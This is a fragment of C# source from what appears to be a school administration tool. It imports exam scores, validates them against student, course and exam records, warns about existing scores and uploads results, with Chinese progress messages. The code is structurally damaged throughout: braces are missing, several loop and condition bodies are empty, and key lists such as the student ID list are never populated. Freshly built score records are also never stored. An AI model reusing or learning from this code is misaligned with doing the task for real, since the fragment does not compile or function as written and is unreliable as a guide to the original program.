                _dataRecordValidator = new DataValidator <DataRecord>();

                #region 取得驗證需要的資料
                _worker.ReportProgress(0, "取得學生資料…");
                List <JHStudentRecord> studentList = GetInSchoolStudents();

                List <string> s_ids = new List <string>();
                Dictionary <string, List <string> > studentNumberToStudentIDs = new Dictionary <string, List <string> >();
                foreach (JHStudentRecord student in studentList)
                    string sn = SCValidatorCreator.GetStudentNumberFormat(student.StudentNumber);
                    if (!studentNumberToStudentIDs.ContainsKey(sn))
                        studentNumberToStudentIDs.Add(sn, new List <string>());
                foreach (var dr in drCollection)
                    if (studentNumberToStudentIDs.ContainsKey(dr.StudentNumber))


                _worker.ReportProgress(0, "取得課程資料…");
                List <JHCourseRecord>    courseList = JHCourse.SelectBySchoolYearAndSemester(SchoolYear, Semester);
                List <JHAEIncludeRecord> aeList     = JHAEInclude.SelectAll();

                //List<JHSCAttendRecord> scaList = JHSCAttend.SelectAll();
                var c_ids = from course in courseList select course.ID;
                _worker.ReportProgress(0, "取得修課資料…");
                //List<JHSCAttendRecord> scaList2 = JHSCAttend.SelectByStudentIDAndCourseID(s_ids, c_ids.ToList<string>());
                List <JHSCAttendRecord> scaList = new List <JHSCAttendRecord>();
                FunctionSpliter <string, JHSCAttendRecord> spliter = new FunctionSpliter <string, JHSCAttendRecord>(300, 3);
                spliter.Function = delegate(List <string> part)
                    return(JHSCAttend.Select(part, c_ids.ToList <string>(), null, SchoolYear.ToString(), Semester.ToString()));
                scaList = spliter.Execute(s_ids);

                _worker.ReportProgress(0, "取得試別資料…");
                List <JHExamRecord> examList = JHExam.SelectAll();

                #region 註冊驗證
                _worker.ReportProgress(0, "載入驗證規則…");
                _rawDataValidator.Register(new SubjectCodeValidator());
                _rawDataValidator.Register(new ClassCodeValidator());
                _rawDataValidator.Register(new ExamCodeValidator());

                SCValidatorCreator scCreator = new SCValidatorCreator(JHStudent.SelectByIDs(s_ids), courseList, scaList);
                _dataRecordValidator.Register(new ExamValidator(examList));
                _dataRecordValidator.Register(new CourseExamValidator(scCreator.StudentCourseInfo, aeList, examList));

                #region 進行驗證
                _worker.ReportProgress(0, "進行驗證中…");
                List <string> msgList = new List <string>();

                foreach (RawData rawData in rdCollection)
                    List <string> msgs = _rawDataValidator.Validate(rawData);
                if (msgList.Count > 0)
                    e.Result = msgList;

                foreach (DataRecord dataRecord in drCollection)
                    List <string> msgs = _dataRecordValidator.Validate(dataRecord);
                if (msgList.Count > 0)
                    e.Result = msgList;

                #region 取得學生的評量成績

                //var student_ids = from student in scCreator.StudentNumberDictionary.Values select student.ID;
                //List<string> course_ids = scCreator.AttendCourseIDs;

                var scaIDs = from sca in scaList select sca.ID;

                Dictionary <string, JHSCETakeRecord>      sceList    = new Dictionary <string, JHSCETakeRecord>();
                FunctionSpliter <string, JHSCETakeRecord> spliterSCE = new FunctionSpliter <string, JHSCETakeRecord>(300, 3);
                spliterSCE.Function = delegate(List <string> part)
                    return(JHSCETake.Select(null, null, null, null, part));
                foreach (JHSCETakeRecord sce in spliterSCE.Execute(scaIDs.ToList()))
                    string key = GetCombineKey(sce.RefStudentID, sce.RefCourseID, sce.RefExamID);
                    if (!sceList.ContainsKey(key))
                        sceList.Add(key, sce);

                Dictionary <string, JHExamRecord>     examTable = new Dictionary <string, JHExamRecord>();
                Dictionary <string, JHSCAttendRecord> scaTable  = new Dictionary <string, JHSCAttendRecord>();

                foreach (JHExamRecord exam in examList)
                    if (!examTable.ContainsKey(exam.Name))
                        examTable.Add(exam.Name, exam);

                foreach (JHSCAttendRecord sca in scaList)
                    string key = GetCombineKey(sca.RefStudentID, sca.RefCourseID);
                    if (!scaTable.ContainsKey(key))
                        scaTable.Add(key, sca);

                foreach (DataRecord dr in drCollection)
                    JHStudentRecord       student = student = scCreator.StudentNumberDictionary[dr.StudentNumber];
                    JHExamRecord          exam    = examTable[dr.Exam];
                    List <JHCourseRecord> courses = new List <JHCourseRecord>();
                    foreach (JHCourseRecord course in scCreator.StudentCourseInfo.GetCourses(dr.StudentNumber))
                        if (dr.Subjects.Contains(course.Subject))

                    foreach (JHCourseRecord course in courses)
                        string key = GetCombineKey(student.ID, course.ID, exam.ID);

                        if (sceList.ContainsKey(key))

                        JHSCETakeRecord    jh     = new JHSCETakeRecord();
                        KH.JHSCETakeRecord sceNew = new KH.JHSCETakeRecord(jh);
                        sceNew.RefCourseID   = course.ID;
                        sceNew.RefExamID     = exam.ID;
                        sceNew.RefSCAttendID = scaTable[GetCombineKey(student.ID, course.ID)].ID;
                        sceNew.RefStudentID  = student.ID;
                        sceNew.Score         = dr.Score;
                        sceNew.Effort        = _effortMapper.GetCodeByScore(dr.Score);

                e.Result = null;
            _worker.RunWorkerCompleted += delegate(object sender, RunWorkerCompletedEventArgs e)
                #region Worker Completed
                if (e.Error == null && e.Result == null)
                    if (!_upload.IsBusy)
                        if (_deleteScoreList.Count > 0)
                            lblMessage.Text = "成績上傳中…";
                            FISCA.Presentation.MotherForm.SetStatusBarMessage("成績上傳中…", 0);
                            counter = 0;
                    ControlEnable = true;

                    if (e.Error != null)
                        MsgBox.Show("匯入失敗。" + e.Error.Message);
                    else if (e.Result != null && e.Result is ValidateTextResult)
                        ValidateTextResult    result = e.Result as ValidateTextResult;
                        ValidationErrorViewer viewer = new ValidationErrorViewer();
                        viewer.SetTextFileError(result.LineIndexes, result.ErrorFormatLineIndexes, result.DuplicateLineIndexes);
                    else if (e.Result != null && e.Result is List <string> )
                        ValidationErrorViewer viewer = new ValidationErrorViewer();
                        viewer.SetErrorLines(e.Result as List <string>);

            _upload = new BackgroundWorker();
            _upload.WorkerReportsProgress = true;
            _upload.ProgressChanged      += new ProgressChangedEventHandler(_upload_ProgressChanged);
            //_upload.ProgressChanged += delegate(object sender, ProgressChangedEventArgs e)
            //    counter += double.Parse("" + e.ProgressPercentage);
            //    FISCA.Presentation.MotherForm.SetStatusBarMessage("成績上傳中…", (int)(counter * 100f / (double)_addScoreList.Count));
            _upload.DoWork += new DoWorkEventHandler(_upload_DoWork);

            //_upload.DoWork += delegate

            //#region Upload DoWork
            //Framework.MultiThreadWorker<JHSCETakeRecord> multi = new Framework.MultiThreadWorker<JHSCETakeRecord>();
            //multi.MaxThreads = 3;
            //multi.PackageSize = 500;
            //multi.PackageWorker += delegate(object sender, Framework.PackageWorkEventArgs<JHSCETakeRecord> e)
            //    JHSCETake.Delete(e.List);

            //Framework.MultiThreadWorker<JHSCETakeRecord> multi2 = new Framework.MultiThreadWorker<JHSCETakeRecord>();
            //multi2.MaxThreads = 3;
            //multi2.PackageSize = 500;
            //multi2.PackageWorker += delegate(object sender, Framework.PackageWorkEventArgs<JHSCETakeRecord> e)
            //    JHSCETake.Insert(e.List);
            //    lock (_upload)
            //    {
            //        _upload.ReportProgress(e.List.Count);
            //    }

            _upload.RunWorkerCompleted += new RunWorkerCompletedEventHandler(_upload_RunWorkerCompleted);

            _warn = new BackgroundWorker();
            _warn.WorkerReportsProgress = true;
            _warn.DoWork += delegate(object sender, DoWorkEventArgs e)
                _warn.ReportProgress(0, "產生警告訊息...");

                Dictionary <string, string> examDict = new Dictionary <string, string>();
                foreach (JHExamRecord exam in JHExam.SelectAll())
                    if (!examDict.ContainsKey(exam.ID))
                        examDict.Add(exam.ID, exam.Name);

                WarningForm form  = new WarningForm();
                int         count = 0;
                foreach (JHSCETakeRecord sce in _deleteScoreList)
                    // 當成績資料是空值跳過
                    if (sce.Score.HasValue == false && sce.Effort.HasValue == false && string.IsNullOrEmpty(sce.Text))


                    JHStudentRecord student = JHStudent.SelectByID(sce.RefStudentID);
                    JHCourseRecord  course  = JHCourse.SelectByID(sce.RefCourseID);
                    string          exam    = (examDict.ContainsKey(sce.RefExamID) ? examDict[sce.RefExamID] : "<未知的試別>");

                    string s = "";
                    if (student.Class != null)
                        s += student.Class.Name;
                    if (!string.IsNullOrEmpty("" + student.SeatNo))
                        s += " " + student.SeatNo + "號";
                    if (!string.IsNullOrEmpty(student.StudentNumber))
                        s += " (" + student.StudentNumber + ")";
                    s += " " + student.Name;

                    form.Add(student.ID, s, string.Format("學生在「{0}」課程「{1}」中已有成績。", course.Name, exam));
                    _warn.ReportProgress((int)(count * 100 / _deleteScoreList.Count), "產生警告訊息...");

                e.Result = form;
            _warn.RunWorkerCompleted += delegate(object sender, RunWorkerCompletedEventArgs e)
                WarningForm form = e.Result as WarningForm;

                if (form.ShowDialog() == DialogResult.OK)
                    lblMessage.Text = "成績上傳中…";
                    FISCA.Presentation.MotherForm.SetStatusBarMessage("成績上傳中…", 0);
                    counter = 0;
                    this.DialogResult = DialogResult.Cancel;
            _warn.ProgressChanged += delegate(object sender, ProgressChangedEventArgs e)
                FISCA.Presentation.MotherForm.SetStatusBarMessage("" + e.UserState, e.ProgressPercentage);

            _files           = new List <FileInfo>();
            _addScoreList    = new List <JHSCETakeRecord>();
            _deleteScoreList = new List <JHSCETakeRecord>();